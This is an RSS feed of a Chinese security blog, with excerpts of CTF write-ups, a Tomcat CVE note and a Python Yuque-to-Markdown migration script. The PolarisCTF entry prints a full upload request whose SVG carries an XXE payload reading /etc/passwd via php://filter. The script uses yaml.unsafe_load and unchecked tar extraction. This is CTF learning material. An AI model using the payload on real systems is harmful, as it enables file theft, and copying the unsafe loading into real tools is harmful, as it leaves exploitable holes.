https://baozongwi.xyz/baozongwi's blogThu, 14 May 2026 06:52:56 +0000https://baozongwi.xyz/p/alictf-2026-fileury/https://baozongwi.xyz/p/alictf-2026-fileury/Wed, 06 May 2026 11:29:09 +0800jdk8 一种常见但我第一次学习的手法 ext jar rceTL;DR 之前我有一篇文章 https://baozongwi.xyz/p/alictf-2025-jtools/ 就是 fury 反序列化，并且我之前学习复现的时候，知道了华东北分区赛少了一个依赖com.feilong.lib，我猜测可能在未来这个出题人还会再次掏出这题，而出题人也就是大家熟知的 …https://baozongwi.xyz/p/jqctf-2025-fastj/https://baozongwi.xyz/p/jqctf-2025-fastj/Wed, 06 May 2026 11:29:09 +0800缓存🤪TL;DR 题目也不公开😤，差点找不到，感谢 symv1a 师傅提供的附件～ 我听说这道题是一条 only JDK11 gadget，并且后续涉及到任意文件写入到RCE，所以来学习下 分析 回头看看 fastjson 1.2.68 jdk8 任意文件写以及 jdk11 …https://baozongwi.xyz/p/yuque-to-obsidian-migration/https://baozongwi.xyz/p/yuque-to-obsidian-migration/Thu, 30 Apr 2026 16:55:51 +0800我尝试过直接利用 API 导出转换但是很遗憾，一个 API 一小时的次数实际上迁移这 200 多篇文档居然不够用，直接坠机，然后看到可以导出.lakebook，再转成 Markdown。yuque2markdown 这个工具就是干这个的 git clone https://github.com/alswl/yuque2markdown.git cd yuque2markdown && \ pip3 install -r requirements.txt 把所有.lakebook下载到 download 目录下之后直接处理，参考这个脚本自己优化了一下，比如图片无法下载等 bug（很多 bug 最后的脚本如下 # coding=utf-8 import json import os import random import shutil import sys import argparse import tarfile from base64 import b64decode from binascii import Error as BinasciiError from io import BytesIO from urllib.parse import unquote, unquote_to_bytes, urlparse from markdownify import markdownify as md from bs4 import BeautifulSoup from PIL import Image, UnidentifiedImageError from requests import get from requests.exceptions import RequestException import yaml import tempfile TYPE_TITLE = "TITLE" TYPE_DOC = "DOC" META_JSON = "$meta.json" TMP_DIR = tempfile.gettempdir() DEFAULT_HEADING_STYLE = "ATX" CONTENT_TYPE_TO_EXTENSION = { "image/gif": ".gif", "image/jpeg": ".jpg", "image/jpg": ".jpg", "image/svg+xml": ".svg", "image/png": ".png", "image/webp": ".webp", } CONVERT_TO_PNG_EXTENSIONS = {".jpg", ".jpeg", ".png", ".webp"} def sanitizer_file_name(name): name = name.replace("/", "_") name = name.replace("\\", "_") name = name.replace(" ", "_") name = name.replace("?", "_") name = name.replace("*", "_") name = name.replace("<", "_") name = name.replace(">", "_") name = name.replace("|", "_") name = name.replace('"', "_") name = name.replace(":", "_") return name def read_toc(random_tmp_dir): # open meta json f = open(os.path.join(random_tmp_dir, META_JSON), "r", encoding="utf-8") meta_file_str = json.loads(f.read()) meta_str = meta_file_str.get("meta", "") meta = json.loads(meta_str) toc_str = meta.get("book", {}).get("tocYml", "") toc = yaml.unsafe_load(toc_str) f.close() return toc def extract_repos(repo_dir, output, toc, download_image): last_level = 0 last_sanitized_title = "" path_prefixed = [] for item in toc: t = item["type"] url = str(item.get("url", "")) current_level = item.get("level", 0) title = str(item.get("title", "")) sanitized_title = sanitizer_file_name(str(title)) if not title: continue while True: if os.path.exists(os.path.join(output, sanitized_title)): sanitized_title = sanitizer_file_name(str(title)) + str( random.randint(0, 1000) ) break if current_level > last_level: path_prefixed = path_prefixed + [last_sanitized_title] elif current_level < last_level: diff = last_level - current_level path_prefixed = path_prefixed[0:-diff] # else: if t == TYPE_DOC: output_dir_path = os.path.join(output, *path_prefixed) if not os.path.exists(output_dir_path): os.makedirs(output_dir_path) article_dir_path = os.path.join(output_dir_path, sanitized_title) if not os.path.exists(article_dir_path): os.makedirs(article_dir_path) raw_path = os.path.join(repo_dir, url + ".json") raw_file = open(raw_path, "r", encoding="utf-8") doc_str = json.loads(raw_file.read()) html = doc_str["doc"]["body"] or doc_str["doc"]["body_asl"] if download_image: html = download_images_and_patch_html( repo_dir, article_dir_path, html ) output_path = os.path.join(article_dir_path, sanitized_title + ".md") f = open(output_path, "w", encoding="utf-8") f.write(pretty_md(md(html, heading_style=DEFAULT_HEADING_STYLE))) last_sanitized_title = sanitized_title last_level = current_level def download_images_and_patch_html(repo_dir, output_dir_path, html): bs = BeautifulSoup(html, "html.parser") if len(bs.find_all("img")) > 0: attachments_dir_path = os.path.join(output_dir_path, "assets") if not os.path.exists(attachments_dir_path): os.mkdir(attachments_dir_path) no = 1 for image in bs.find_all("img"): src = image.get("src", "") if not src: continue parsed_src = urlparse(src) png_file_name = "%03d.png" % no attachments_file_path = os.path.join(attachments_dir_path, png_file_name) if parsed_src.scheme in ("http", "https") or src.startswith("//"): url = "https:" + src if src.startswith("//") else src print("Download %s" % src) try: resp = get(url, timeout=30) resp.raise_for_status() except RequestException as e: print("Skip image %s: %s" % (src, e)) continue content_type = resp.headers.get("Content-Type", "") if should_convert_to_png(src, content_type) and save_image_as_png( BytesIO(resp.content), attachments_file_path ): file_name = png_file_name else: file_name = save_original_image( resp.content, attachments_dir_path, no, src, content_type ) elif parsed_src.scheme == "data": data_uri = parse_data_uri(src) if not data_uri: print("Skip image %s: invalid data URI" % src[:80]) continue content_type, image_data = data_uri if should_convert_to_png(src, content_type) and save_image_as_png( BytesIO(image_data), attachments_file_path ): file_name = png_file_name else: file_name = save_original_image( image_data, attachments_dir_path, no, src, content_type ) elif parsed_src.scheme: print("Skip image %s: unsupported scheme" % src) continue else: src_path = unquote(parsed_src.path).lstrip("/") local_image_path = os.path.abspath(os.path.join(repo_dir, src_path)) repo_dir_abs = os.path.abspath(repo_dir) if not local_image_path.startswith(repo_dir_abs + os.sep) or not os.path.isfile( local_image_path ): print("Remove image %s: local file not found" % src) image.decompose() continue if should_convert_to_png(src) and save_image_as_png( local_image_path, attachments_file_path ): file_name = png_file_name else: file_name = save_original_file( local_image_path, attachments_dir_path, no, src ) no = no + 1 image["src"] = "./assets/" + file_name html = str(bs) return html else: return html def should_convert_to_png(src, content_type=""): extension = image_extension(src, content_type, "") return extension == "" or extension in CONVERT_TO_PNG_EXTENSIONS def image_extension(src, content_type="", default=".img"): content_type = content_type.split(";", 1)[0].strip().lower() if content_type in CONTENT_TYPE_TO_EXTENSION: return CONTENT_TYPE_TO_EXTENSION[content_type] extension = os.path.splitext(unquote(urlparse(src).path))[1].lower() if extension: return extension return default def save_original_image(image_data, attachments_dir_path, no, src, content_type=""): file_name = "%03d%s" % (no, image_extension(src, content_type)) attachments_file_path = os.path.join(attachments_dir_path, file_name) with open(attachments_file_path, "wb") as f: f.write(image_data) return file_name def save_original_file(local_image_path, attachments_dir_path, no, src): file_name = "%03d%s" % (no, image_extension(src)) attachments_file_path = os.path.join(attachments_dir_path, file_name) shutil.copyfile(local_image_path, attachments_file_path) return file_name def parse_data_uri(src): try: header, image_data = src.split(",", 1) except ValueError: return None if not header.startswith("data:"): return None parts = header[5:].split(";") content_type = parts[0] or "text/plain" try: if "base64" in parts[1:]: image_data = b64decode(image_data) else: image_data = unquote_to_bytes(image_data) except (BinasciiError, ValueError): return None return content_type, image_data def save_image_as_png(image_file, output_path): try: with Image.open(image_file) as image: if image.mode in ("RGBA", "LA"): output = image elif image.mode == "P" and "transparency" in image.info: output = image.convert("RGBA") else: output = image.convert("RGB") output.save(output_path, "PNG") except (OSError, UnidentifiedImageError): return False return True def pretty_md(text: str) -> str: output = text lines = output.split("\n") for i in range(len(lines)): lines[i] = lines[i].rstrip() output = "\n".join(lines) for i in range(50): output = output.replace("\n\n\n", "\n\n") if "\n\n\n" not in output: break return output def main(): parser = argparse.ArgumentParser(description="Convert Yuque doc to markdown") parser.add_argument("lakebook", help="Lakebook file") parser.add_argument("output", help="Output directory") parser.add_argument( "--download-image", help="Download images to local", action="store_true" ) args = parser.parse_args() if not os.path.exists(args.lakebook): print("Lakebook file not found: " + args.lakebook) sys.exit(1) if not os.path.exists(args.output): os.mkdir(args.output) # extract lakebook file random_tmp_dir = os.path.join(TMP_DIR, "lakebook_" + str(os.getpid())) extract_tar(args.lakebook, random_tmp_dir) # detect only one directory in random_tmp_dir repo_dir = "" for root, dirs, files in os.walk(random_tmp_dir): for d in dirs: repo_dir = os.path.join(random_tmp_dir, d) break break if not repo_dir: print(".lakebook file is invalid") sys.exit(1) toc = read_toc(repo_dir) # print len of toc print("Total " + str(len(toc)) + " files") extract_repos(repo_dir, args.output, toc, args.download_image) # remove tmp dir shutil.rmtree(random_tmp_dir) # extract tar file in tar.gz def extract_tar(tar_file, target_dir): if not os.path.exists(target_dir): os.mkdir(target_dir) tar = tarfile.open(tar_file) names = tar.getnames() for name in names: tar.extract(name, target_dir) tar.close() if __name__ == "__main__": main() ## python3 yuque2markdown.py "/Users/baozongwi/Downloads/实习.lakebook" "/Users/baozongwi/My_Vault/实习" --download-image我尝试过直接利用 API 导出转换但是很遗憾，一个 API 一小时的次数实际上迁移这 200 多篇文档居然不够用，直接坠机，然后看到可以导出.lakebook，再转成 Markdown。yuque2markdown 这个工具就是干这个的 git clone …https://baozongwi.xyz/p/ctfshow-rare-solved-challenges/https://baozongwi.xyz/p/ctfshow-rare-solved-challenges/Wed, 29 Apr 2026 16:58:02 +0800并不是说他一定是少解的，而是网上 WP 可能不详细且此前一年、两年 baozongwi 无法独立解决的题目 未完成的项目 F5 杯 很久以前的题目，出自 Y4tacker 大手子，首先直接进行了js 泄露，拿到源码 var express = require('express'); var router = express.Router(); var db = require('mysql-promise') const mysql = require( 'mysql' ); const connection = require("mysql"); class Database { constructor( config ) { this.connection = mysql.createConnection( config ); } query( sql, args ) { return new Promise( ( resolve, reject ) => { this.connection.query( sql, args, ( err, rows ) => { if ( err ) return reject( err ); resolve( rows ); } ); } ); } close() { return new Promise( ( resolve, reject ) => { this.connection.end( err => { if ( err ) return reject(err); resolve(); } ); } ); } } const isObject = obj => obj && obj.constructor && obj.constructor === Object; function merge(a, b) { for (var attr in b) { if (isObject(a[attr]) && isObject(b[attr])) { merge(a[attr], b[attr]); } else { a[attr] = b[attr]; } } return a } function clone(a) { return merge({}, a); } router.get('/',function (req,res,next) { console.log("index"); //res.render('index', {title: 'HTML'}); }) /* GET home page. */ router.post('/', function(req, res, next) { var body = JSON.parse(JSON.stringify(req.body)); if (body.host != undefined) { return res.json({ "msg":"fu** hacker!!!" }) } var num = 0 for(i in body){ num ++; } if(num!=2){ return res.json({ "msg":"fu** hacker!!!" }) }else{ if(body.username==undefined||body.password==undefined){ return res.json({ "msg":"fu** hacker!!!" }) } } var copybody = clone(body) var host = copybody.host == undefined ? "localhost" : copybody.host var flag = "123432432432" var config = { host: host, user: 'root', password: 'root', database: 'users' }; let database=new Database(config); var user = copybody.username var pass = copybody.password function isInValiCode(str) { var reg= /-| |#|[\x00-\x2f]|[\x3a-\x3f]/; return reg.test(str); } if (isInValiCode(user)){ return res.json({ "msg":"no hacker!!!" }) } let someRows, otherRows; database.query( 'select * from user where user= ? and passwd =?', [user,pass] ) .then( rows => { if (1 == rows[0].Id) { res.json({ "msg":flag }) } } ) .then( rows => { otherRows = rows; return database.close(); }, err => { return database.close().then( () => { throw err; } ) } ) .then( () => { res.json({ "error": "err","msg":"user or pass err" }) }) .catch( err => { res.json({ "error": "err","msg":"user or pass err" }) } ) }); module.exports = router; 一眼看到有个 merge 函数，登录接口里虽然禁止直接传 host，但后面又从 copybody.host 取 MySQL 连接地址并不是说他一定是少解的，而是网上 WP 可能不详细且此前一年、两年 baozongwi 无法独立解决的题目 未完成的项目 F5 杯 很久以前的题目，出自 Y4tacker 大手子，首先直接进行了js 泄露，拿到源码 var express = require('express'); …https://baozongwi.xyz/p/cve-2026-34486/https://baozongwi.xyz/p/cve-2026-34486/Wed, 15 Apr 2026 22:20:53 +0800看我装糖阴他一手🙈一开始是 QAX 微信公众号发了推文，群友转发推文，并提及“Tomcat 又又又又 RCE 了”，但是我一看怎么评分才7.5 分，那么他肯定是有条件的 RCE，并且条件还不小🙂‍↔️ 在 2026 年 3 月 13 日，一个单一的提交被应用到所有三个活跃分支，引入了回归。 Branch 分支 …https://baozongwi.xyz/p/hugo-password-design/https://baozongwi.xyz/p/hugo-password-design/Sat, 11 Apr 2026 15:05:23 +0800Protected content is hidden until the correct password is entered.Protected content is hidden until the correct password is entered.https://baozongwi.xyz/p/sub2api-setup/https://baozongwi.xyz/p/sub2api-setup/Sat, 11 Apr 2026 14:32:12 +0800站起来蹬🚉TL;DR 由于中转站的注册机大多都是 free 的账号，每次官方充值额度就会被封号，然后我前段日子在群里和好哥哥们闲聊发现还不止一个人有 sub2api，自己统筹管理自己的账号，再加上自己的邮箱有好几个，plus 账号也足够便宜，所以我也搞了一个，虽然中途出了点问题，但是 @Mnzn 帮我解决了， …https://baozongwi.xyz/p/polarisctf-2026/https://baozongwi.xyz/p/polarisctf-2026/Sat, 04 Apr 2026 12:04:07 +0800头像上传器 /api/avatar.php 可以打 XXE，可以解析 php://filter所以直接打 filter-chain， POST /api/upload.php HTTP/1.1 Host: 80-5f7b9a82-754e-4797-9a96-f13ac6f12b01.challenge.ctfplus.cn Content-Length: 392 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBn7FqU28RNwXElDx Accept: */* Origin: http://80-5f7b9a82-754e-4797-9a96-f13ac6f12b01.challenge.ctfplus.cn Referer: http://80-5f7b9a82-754e-4797-9a96-f13ac6f12b01.challenge.ctfplus.cn/home.html Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7 Cookie: _ga=GA1.1.360932415.1774506199; _clck=1j4ja68%5E2%5Eg4r%5E0%5E2276; _ga_BFDVYZJ3DE=GS2.1.s1774772786$o6$g0$t1774772786$j60$l0$h0; _clsk=970rhe%5E1774772788346%5E1%5E1%5Ei.clarity.ms%2Fcollect; PHPSESSID=j6eirikj9ds15has0ctqptmiro Connection: keep-alive ------WebKitFormBoundaryBn7FqU28RNwXElDx Content-Disposition: form-data; name="file"; filename="1.svg" Content-Type: image/svg+xml <?xml version="1.0"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]> <svg xmlns="http://www.w3.org/2000/svg"> <text x="0" y="20">&xxe;</text> </svg> ------WebKitFormBoundaryBn7FqU28RNwXElDx-- 保存 POST /api/update_profile.php HTTP/1.1 Host: 80-5f7b9a82-754e-4797-9a96-f13ac6f12b01.challenge.ctfplus.cn Content-Length: 60 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Content-Type: application/json Accept: */* Origin: http://80-5f7b9a82-754e-4797-9a96-f13ac6f12b01.challenge.ctfplus.cn Referer: http://80-5f7b9a82-754e-4797-9a96-f13ac6f12b01.challenge.ctfplus.cn/home.html Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7 Cookie: _ga=GA1.1.360932415.1774506199; _clck=1j4ja68%5E2%5Eg4r%5E0%5E2276; _ga_BFDVYZJ3DE=GS2.1.s1774772786$o6$g0$t1774772786$j60$l0$h0; _clsk=970rhe%5E1774772788346%5E1%5E1%5Ei.clarity.ms%2Fcollect; PHPSESSID=j6eirikj9ds15has0ctqptmiro Connection: keep-alive {"display_name":"test","avatar_name":"0b403f917f196872.svg"} 读取头像上传器 /api/avatar.php 可以打 XXE，可以解析 php://filter所以直接打 filter-chain， POST /api/upload.php HTTP/1.1 Host: …